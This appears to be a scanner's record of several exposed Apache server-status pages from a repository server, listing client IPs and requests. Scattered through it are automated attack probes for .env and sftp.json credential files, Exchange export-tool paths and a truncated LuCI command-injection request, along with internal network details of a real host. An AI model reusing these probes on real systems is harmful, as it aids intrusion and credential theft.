77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116-0/0/423. 0.0016608503959270.00.00348.35 149.50.110.239http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/469. 0.001660852439183650.00.0059394.98 165.154.172.111http/1.1repo.nimoz.pl:443GET /axis2-admin/ HTTP/1.1 0-116-0/0/447. 0.0016608501468380.00.0061.19 149.50.110.239http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/453. 0.00166085028213440.00.001476.95 34.78.249.41http/1.1 0-116-0/0/440. 0.00166085304498310.00.002565.85 77.91.85.95http/1.1 0-116-0/0/420. 0.00166085216549220.00.00541.70 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116-0/0/436. 0.0016608502473680.00.00442.42 118.193.39.117http/1.1 0-116-0/0/466. 0.00166085048380410.00.002663.74 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/js/dist/main.js?v=c03a1674-3 HTTP/1.1 0-116-0/0/697. 0.00166085014001650.00.007256.20 192.241.209.26http/1.1 0-116-0/0/483. 0.001660852814986620.00.00133763.64 41.34.132.130http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-116-0/0/491. 0.00166085232895160.00.00410.88 41.35.93.122http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-116-0/0/426. 0.001660852621850340.00.00115445.95 199.45.154.30http/1.1 0-116-0/0/409. 0.00166085186841990.00.0063974.86 199.45.154.30http/1.1 0-116-0/0/489. 0.00166085025420750.00.002800.12 199.45.154.30http/1.1 1-116-0/0/159. 0.001660850354100.00.002.46 77.91.85.95http/1.1 1-116-0/0/147. 0.0016608523125340.00.001.53 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-116-0/0/121. 0.001660850154640.00.005.05 118.193.39.117http/1.1repo.nimoz.pl:443t3 12.1.2\n 1-116-0/0/194. 0.001660850392770.00.003.63 93.174.95.106http/1.1 1-116-0/0/1900. 0.001660852662196710.00.0028259.11 118.193.39.117http/1.1 1-116-0/0/155. 0.0016608502859090.00.002.02 165.154.172.111http/1.1repo.nimoz.pl:443GET /robots.txt HTTP/1.1 1-116-0/0/132. 0.001660850148870.00.002.04 93.174.95.106http/1.1 1-116-0/0/139. 0.001660850425780.00.0067.32 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-116-0/0/128. 0.0016608503661770.00.00345.90 52.206.120.31http/1.1 1-116-0/0/179. 0.001660850232950.00.003.26 80.82.77.202http/1.1 1-116-0/0/123. 0.001660850447250.00.0076.85 93.174.95.106http/1.1 1-116-0/0/166. 0.0016608522733690.00.0059.95 165.154.172.111http/1.1repo.nimoz.pl:443GET /axis2/ HTTP/1.1 1-116-0/0/147. 0.001660850232140.00.002.40 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/js/backgroundjobs.js?v=c03a1674-3 HTTP/1.1 1-116-0/0/146. 0.001660850217000.00.001.61 93.174.95.106http/1.1 1-116-0/0/142. 0.0016608503598720.00.00345.89 93.174.95.106http/1.1 1-116-0/0/117. 0.001660850400160.00.0086.28 199.45.155.34h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-116-0/0/188. 0.001660850301540.00.002.08 80.94.92.60http/1.1vm-repo-prd.nimoz.local:80PUT /SDK/webLanguage HTTP/1.1 1-116-0/0/164. 0.00166085208017690.00.00896.77 93.174.95.106http/1.1repo.nimoz.pl:443\n 1-116-0/0/142. 0.001660850171420.00.001.61 93.174.95.106http/1.1 1-116-0/0/137. 0.0016608523138570.00.001.42 165.154.172.111http/1.1repo.nimoz.pl:443GET /index.php/js/core/merged-template-prepend.js?v=c03a1674-3 1-116-0/0/168. 0.0016608504779650.00.00426.87 199.45.155.34http/1.1vm-repo-prd.nimoz.local:80PRI * HTTP/2.0 1-116-0/0/180. 0.00166085041325670.00.002038.05 84.54.51.37http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-116-0/0/150. 0.001660850123640.00.001.32 77.91.85.95http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-116-0/0/248. 0.001660853222021080.00.002891.31 118.193.39.117h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-116-0/0/162. 0.0016608525818810.00.0081.21 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-118200520/41/795_ 1.6002718028480.00.94903.41 164.90.228.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-118200520/12/675_ 1.631023115040.00.066317.48 198.199.118.121http/1.1repo.nimoz.pl:443GET / HTTP/1.0 2-118200520/14/588_ 1.67004207020.00.08271.30 164.90.228.79http/1.1 2-118</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448f9b4fac2
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 22-May-2024 22:31:58 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 118 Parent Server MPM Generation: 117 Server uptime: 117 days 12 hours 25 minutes 56 seconds Server load: 0.00 0.00 0.00 Total accesses: 40468 - Total Traffic: 750.3 GB - Total Duration: 118352614 CPU Usage: u56.24 s133.88 cu988.29 cs688.02 - .0184% CPU load .00399 requests/sec - 77.5 kB/second - 19.0 MB/request - 2924.6 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 216953no0yes025000 316954no0yes124000 Sum200 149000 ..................................................______________ ___________________W________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-116-0/0/414. 0.008110929793820.00.00131.20 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116-0/0/453. 0.008110901021200.00.005.39 84.54.51.37http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-116-0/0/469. 0.0081109078199420.00.00132866.13 185.224.128.43http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/1482. 0.00811090189808360.00.0024865.38 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/js/dist/files_fileinfo.js?v=c03a1674-3 HTTP/1.1 0-116-0/0/439. 0.008110908733960.00.001437.58 93.174.95.106http/1.1 0-116-0/0/490. 0.0081109041332430.00.002234.18 118.193.39.117h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-116-0/0/397. 0.008110905506750.00.0034602.28 118.193.39.117http/1.1 0-116-0/0/506. 0.0081109032341700.00.003141.38 34.78.249.41http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/450. 0.0081109011658710.00.002054.04 118.193.39.117http/1.1 0-116-0/0/461. 0.008110904938460.00.00365.34 118.193.39.117http/1.1 0-116-0/0/453. 0.00811092123492930.00.0037040.56 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116-0/0/423. 0.008110903959270.00.00348.35 149.50.110.239http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/469. 0.00811092439183650.00.0059394.98 165.154.172.111http/1.1repo.nimoz.pl:443GET /axis2-admin/ HTTP/1.1 0-116-0/0/447. 0.008110901468380.00.0061.19 149.50.110.239http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/453. 0.0081109028213440.00.001476.95 34.78.249.41http/1.1 0-116-0/0/440. 0.0081109304498310.00.002565.85 77.91.85.95http/1.1 0-116-0/0/420. 0.0081109216549220.00.00541.70 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116-0/0/436. 0.008110902473680.00.00442.42 118.193.39.117http/1.1 0-116-0/0/466. 0.0081109048380410.00.002663.74 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/js/dist/main.js?v=c03a1674-3 HTTP/1.1 0-116-0/0/697. 0.0081109014001650.00.007256.20 192.241.209.26http/1.1 0-116-0/0/483. 0.00811092814986620.00.00133763.64 41.34.132.130http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-116-0/0/491. 0.0081109232895160.00.00410.88 41.35.93.122http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-116-0/0/426. 0.00811092621850340.00.00115445.95 199.45.154.30http/1.1 0-116-0/0/409. 0.0081109186841990.00.0063974.86 199.45.154.30http/1.1 0-116-0/0/489. 0.0081109025420750.00.002800.12 199.45.154.30http/1.1 1-116-0/0/159. 0.00811090354100.00.002.46 77.91.85.95http/1.1 1-116-0/0/147. 0.008110923125340.00.001.53 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-116-0/0/121. 0.00811090154640.00.005.05 118.193.39.117http/1.1repo.nimoz.pl:443t3 12.1.2\n 1-116-0/0/194. 0.00811090392770.00.003.63 93.174.95.106http/1.1 1-116-0/0/1900. 0.00811092662196710.00.0028259.11 118.193.39.117http/1.1 1-116-0/0/155. 0.008110902859090.00.002.02 165.154.172.111http/1.1repo.nimoz.pl:443GET /robots.txt HTTP/1.1 1-116-0/0/132. 0.00811090148870.00.002.04 93.174.95.106http/1.1 1-116-0/0/139. 0.00811090425780.00.0067.32 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-116-0/0/128. 0.008110903661770.00.00345.90 52.206.120.31http/1.1 1-116-0/0/179. 0.00811090232950.00.003.26 80.82.77.202http/1.1 1-116-0/0/123. 0.00811090447250.00.0076.85 93.174.95.106http/1.1 1-116-0/0/166. 0.008110922733690.00.0059.95 165.154.172.111http/1.1repo.nimoz.pl:443GET /axis2/ HTTP/1.1 1-116-0/0/147. 0.00811090232140.00.002.40 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/js/backgroundjobs.js?v=c03a1674-3 HTTP/1.1 1-116-0/0/146. 0.00811090217000.00.001.61 93.174.95.106http/1.1 1-116-0/0/142. 0.008110903598720.00.00345.89 93.174.95.106http/1.1 1-116-0/0/117. 0.00811090400160.00.0086.28 199.45.155.34h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-116-0/0/188. 0.00811090301540.00.002.08 80.94.92.60http/1.1vm-repo-prd.nimoz.local:80PUT /SDK/webLanguage HTTP/1.1 1-116-0/0/164. 0.0081109208017690.00.00896.77 93.174.95.106http/1.1repo.nimoz.pl:443\n 1-116-0/0/142. 0.00811090171420.00.001.61 93.174.95.106http/1.1 1-116-0/0/137. 0.008110923138570.00.001.42 165.154.172.111http/1.1repo.nimoz.pl:443GET /index.php/js/core/merged-template-prepend.js?v=c03a1674-3 1-116-0/0/168. 0.008110904779650.00.00426.87 199.45.155.34http/1.1vm-repo-prd.nimoz.local:80PRI * HTTP/2.0 1-116-0/0/180. 0.0081109041325670.00.002038.05 84.54.51.37http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-116-0/0/150. 0.00811090123640.00.001.32 77.91.85.95http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-116-0/0/248. 0.00811093222021080.00.002891.31 118.193.39.117h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-116-0/0/162. 0.008110925818810.00.0081.21 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-117169530/5/754_ 1.3852718000390.00.08902.48 143.244.168.161http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-117169530/6/662_ 1.347872823112580.00.056317.42 188.215.235.115http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 2-117169530/4/574_ 1.3478704198200.00.02271.22 173.212.243.27http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 2-11716953<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448a58e556a
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 12-May-2024 20:44:00 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 108 Parent Server MPM Generation: 107 Server uptime: 107 days 10 hours 37 minutes 57 seconds Server load: 0.00 0.00 0.00 Total accesses: 38474 - Total Traffic: 750.3 GB - Total Duration: 118293516 CPU Usage: u51.48 s122.24 cu972.88 cs686.57 - .0197% CPU load .00414 requests/sec - 84.8 kB/second - 20.0 MB/request - 3074.64 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 018802no0yes025000 118803no0yes124000 Sum200 149000 _______________________________W__________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-107188020/5/397_ 1.42029792420.00.03131.11 104.248.130.34http/1.1repo.nimoz.pl:443GET /Temporary_Listen_Addresses HTTP/1.1 0-107188020/6/440_ 1.43109191020440.00.045.33 104.248.130.34http/1.1repo.nimoz.pl:443GET /ews/autodiscovers/ HTTP/1.1 0-107188020/6/455_ 1.4572578198800.00.04132866.09 147.182.200.94http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-107188020/5/1472_ 1.4410922189807530.00.0324865.32 104.248.130.34http/1.1repo.nimoz.pl:443GET /autodiscove/ HTTP/1.1 0-107188020/7/424_ 1.2910908733430.00.021437.54 87.236.176.156http/1.1 0-107188020/4/483_ 1.5232041331920.00.062234.14 147.182.200.94http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-107188020/6/389_ 1.245245505820.00.0434602.23 147.182.200.94http/1.1 0-107188020/5/491_ 1.417032340560.00.043141.31 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-107188020/7/442_ 1.441092111658400.00.032054.02 104.248.130.34http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscover%20/ HTTP/1.1 0-107188020/4/439_ 1.1010904936970.00.02365.19 87.236.176.176h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-107188020/3/442_ 1.1162923491700.00.0237040.45 147.182.200.94h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-107188020/4/410_ 1.41403958280.00.03348.29 147.182.200.94h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-107188020/7/457_ 1.216039182360.00.0459394.91 147.182.200.94h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-107188020/5/432_ 1.22501466750.00.0561.08 147.182.200.94http/1.1 0-107188020/6/444_ 1.15109028209600.00.021476.47 87.236.176.168http/1.1 0-107188020/4/423_ 1.06110244496170.00.022565.72 139.99.235.40http/1.1 0-107188020/4/402_ 1.13406534610.00.02541.50 147.182.200.94http/1.1 0-107188020/6/426_ 1.532202472880.00.04442.36 147.182.200.94http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-107188020/4/452_ 1.5311948379360.00.032663.21 147.182.200.94http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-107188020/8/686_ 1.416014000790.00.077256.15 147.182.200.94http/1.1 0-107188020/7/468_ 1.34110014985890.00.52133763.58 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-107188020/6/477_ 1.43109212893830.00.02410.75 104.248.130.34http/1.1repo.nimoz.pl:443GET /ews/%20/ HTTP/1.1 0-107188020/5/410_ 1.340021849750.00.05115445.90 87.236.176.144h2repo.nimoz.pl:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-107188020/4/395_ 1.0810906840190.00.0263974.75 87.236.176.154h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-107188020/5/474_ 1.421102025419540.00.032800.05 104.248.130.34http/1.1repo.nimoz.pl:443GET /ews/exchange%20/ HTTP/1.1 1-107188030/2/156_ 0.121100354070.00.012.43 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-107188030/2/142_ 0.4610918124890.00.031.50 104.248.130.34http/1.1repo.nimoz.pl:443GET /ews/ews/ HTTP/1.1 1-107188030/1/116_ 0.1310926154360.00.014.99 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-107188030/1/191_ 0.421090392750.00.003.14 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon-mask.svg HTTP/1.1 1-107188030/1/1893_ 0.471092162195460.00.0128259.01 104.248.130.34http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscoverrs/ HTTP/1.1 1-107188030/2/150_ 0.46109192858330.00.031.98 104.248.130.34http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscovers/ HTTP/1.1 1-107188030/1/127W 0.0300148220.00.002.00 147.182.200.94http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-107188030/2/134_ 0.4243729403930.00.0265.25 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-107188030/1/123_ 0.403253661650.00.01345.85 80.66.83.48http/1.1 1-107188030/2/177_ 0.08528232450.00.023.24 147.182.200.94h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-107188030/1/117_ 0.38719446990.00.0176.82 147.182.200.94h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-107188030/3/160_ 0.51220733110.00.0259.91 147.182.200.94http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 1-107188030/1/141_ 0.034370146880.00.002.30 35.203.211.176http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-107188030/3/145_ 0.51121217000.00.031.61 147.182.200.94http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-107188030/1/140_ 0.03103598480.00.00345.88 44.220.188.87http/1.1 1-107188030/2/115_ 0.38426399870.00.0386.26 147.182.200.94http/1.1 1-107188030/0/185_ 0.0010924301350.00.002.06 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-107188030/2/164_ 0.44110208017690.00.01896.77 104.248.130.34http/1.1repo.nimoz.pl:443GET /ews/exchanges/ HTTP/1.1 1-107188030/1/137_ 0.031100170930.00.001.58 118.26.39.59h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-107188030/2/131_ 0.421100138330.00.011.40 84.54.51.37http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-107188030/4/165_ 0.510174779350.00.04426.85 147.182.200.94http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-107188030/1/178_ 0.061091841325660.00.022038.04 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-107188030/1/145_ 0.0710925122860.00.011.29 157.230.241.93http/1.1 1-107188030/1/244_ 0.451102022020250.00.012891.27 104.248.130.34http/1.1repo.nimoz.pl:443GET /ews/exchange/ HTTP/1.1 1-107188030/1/158_ 0.51325818360.00.0281.15 147.182.200.94http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-106-0/0/702. 0.0074635017995260.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4487b64f012
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 08-May-2024 14:59:47 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 104 Parent Server MPM Generation: 103 Server uptime: 103 days 4 hours 53 minutes 44 seconds Server load: 0.00 0.01 0.00 Total accesses: 37416 - Total Traffic: 750.3 GB - Total Duration: 118278628 CPU Usage: u48.64 s117.16 cu965.25 cs686.01 - .0204% CPU load .0042 requests/sec - 88.2 kB/second - 20.5 MB/request - 3161.18 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 06408no0yes124000 16409no0yes025000 Sum200 149000 ______________W___________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-10364080/5/384_ 0.74023787500.00.02131.03 20.127.146.25http/1.1repo.nimoz.pl:443GET //test/wp-includes/wlwmanifest.xml HTTP/1.1 0-10364080/3/426_ 0.69263901018890.00.005.25 183.81.169.139http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-10364080/3/440_ 0.8112778197980.00.05132866.05 207.154.197.113http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-10364080/1/1459_ 0.4226040189806590.00.0024865.22 107.170.236.41http/1.1 0-10364080/5/408_ 0.80166508732570.00.001437.49 162.216.149.245http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-10364080/4/472_ 0.8802041331320.00.032234.06 207.154.197.113http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-10364080/4/374_ 0.880215504430.00.0534602.13 207.154.197.113http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-10364080/2/476_ 0.641032338990.00.003141.22 146.190.41.214http/1.1vm-repo-prd.nimoz.local:80GET /aab8 HTTP/1.1 0-10364080/0/426_ 0.0012811657580.00.002053.97 142.93.65.94http/1.1 0-10364080/3/427_ 0.77004935840.00.02365.14 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-10364080/3/430_ 0.6916643023490270.00.0337040.37 162.216.149.245http/1.1 0-10364080/1/396_ 0.00003952390.00.00347.74 207.154.197.113http/1.1 0-10364080/5/440_ 0.8802039181620.00.0359394.85 207.154.197.113http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-10364080/2/423_ 0.600241466160.00.0261.03 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-10364080/2/428W 0.680028209280.00.011476.45 207.154.197.113http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-10364080/3/410_ 0.78004494260.00.022565.61 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-10364080/3/389_ 0.64006533550.00.00541.43 207.154.197.113http/1.1 0-10364080/3/411_ 0.880222458730.00.05441.79 207.154.197.113http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-10364080/3/440_ 0.8802048378120.00.012663.14 207.154.197.113http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-10364080/4/666_ 0.751664013998820.00.007256.03 162.216.149.245http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-10364080/2/453_ 0.701664014984560.00.01133763.02 20.127.146.25http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-10364080/5/466_ 0.730192893340.00.02410.71 207.154.197.113http/1.1 0-10364080/5/398_ 0.7803121848200.00.08115445.81 207.154.197.113http/1.1 0-10364080/5/384_ 0.75166406839410.00.0263974.70 84.54.51.41http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-10364080/5/459_ 0.8026402725418580.00.062799.99 165.227.111.8http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-10364090/0/153_ 0.00754222353820.00.002.41 84.54.51.41http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-10364090/1/137_ 0.14845525123750.00.021.43 20.127.146.25http/1.1repo.nimoz.pl:443GET //2021/wp-includes/wlwmanifest.xml HTTP/1.1 1-10364090/0/114_ 0.00166420153850.00.004.96 185.242.226.10http/1.1 1-10364090/3/188_ 0.19024392490.00.053.12 207.154.197.113http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-10364090/0/1889_ 0.000062195020.00.0028258.98 71.6.199.23http/1.1 1-10364090/2/148_ 0.200222857850.00.031.95 207.154.197.113http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-10364090/1/123_ 0.09845529147680.00.021.97 167.86.113.234http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-10364090/0/131_ 0.00845525403630.00.0065.22 71.6.199.23http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-10364090/0/121_ 0.00003661130.00.00345.82 212.102.40.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-10364090/2/172_ 0.11125231890.00.033.21 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-10364090/1/115_ 0.0316640446790.00.0176.80 162.216.149.245http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-10364090/0/154_ 0.00027732690.00.0059.87 212.102.40.218http/1.1 1-10364090/1/140_ 0.14845420146880.00.022.30 20.127.146.25http/1.1repo.nimoz.pl:443GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1 1-10364090/2/138_ 0.13845625215860.00.041.51 20.127.146.25http/1.1repo.nimoz.pl:443GET //2020/wp-includes/wlwmanifest.xml HTTP/1.1 1-10364090/0/137_ 0.008456293598260.00.00345.87 68.183.24.216http/1.1 1-10364090/0/111_ 0.0000399050.00.0086.22 207.154.197.113h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-10364090/1/182_ 0.10507924300800.00.012.04 195.1.144.109http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-10364090/0/161_ 0.00845408017480.00.00896.75 64.62.156.15http/1.1 1-10364090/0/135_ 0.0084540170930.00.001.58 195.1.144.109http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-10364090/1/129_ 0.15845421138320.00.021.39 20.127.146.25http/1.1repo.nimoz.pl:443GET //site/wp-includes/wlwmanifest.xml HTTP/1.1 1-10364090/0/160_ 0.00845604778970.00.00426.80 147.182.239.89h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-10364090/0/177_ 0.0075422441325480.00.002038.02 185.242.226.88http/1.1 1-10364090/0/141_ 0.0050790122060.00.001.24 161.35.38.156http/1.1 1-10364090/0/242_ 0.00845351422019730.00.002891.24 146.190.41.214http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-10364090/2/156_ 0.1101817900.00.0081.12 207.154.197.113http/1.1 2-102-0/0/680. 0.0053979017991650.00.00902.00 52.87.151.179http/1.1 2-102-0/0/606. 0.0053979023105650.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448e02d1619
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Tuesday, 30-Apr-2024 21:29:48 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 96 Parent Server MPM Generation: 95 Server uptime: 95 days 11 hours 23 minutes 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 35851 - Total Traffic: 673.2 GB - Total Duration: 110587580 CPU Usage: u53.82 s117.52 cu865.6 cs621.93 - .0201% CPU load .00435 requests/sec - 85.6 kB/second - 19.2 MB/request - 3084.64 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010934no0yes025000 110935no0yes124000 Sum200 149000 ________________________________W_________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-95109340/6/372_ 19.10122786280.00.03130.98 167.71.175.236http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-95109340/5/415_ 0.64001018390.00.025.21 162.243.136.32http/1.1 0-95109340/3/429_ 19.1102078196910.00.01132865.98 167.71.175.236http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-95109340/6/1455_ 19.01100027189806080.00.0424865.19 46.204.102.118h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-95109340/3/398_ 18.76123508732340.00.001437.48 162.243.136.32http/1.1 0-95109340/35/464_ 18.76995041330240.00.712234.00 138.197.105.152http/1.1vm-repo-prd.nimoz.local:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-95109340/6/360_ 19.101195493360.00.0534602.04 167.71.175.236http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-95109340/7/467_ 13.722032338470.00.033141.18 162.243.136.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-95109340/5/423_ 18.619654633111657050.02051.152053.94 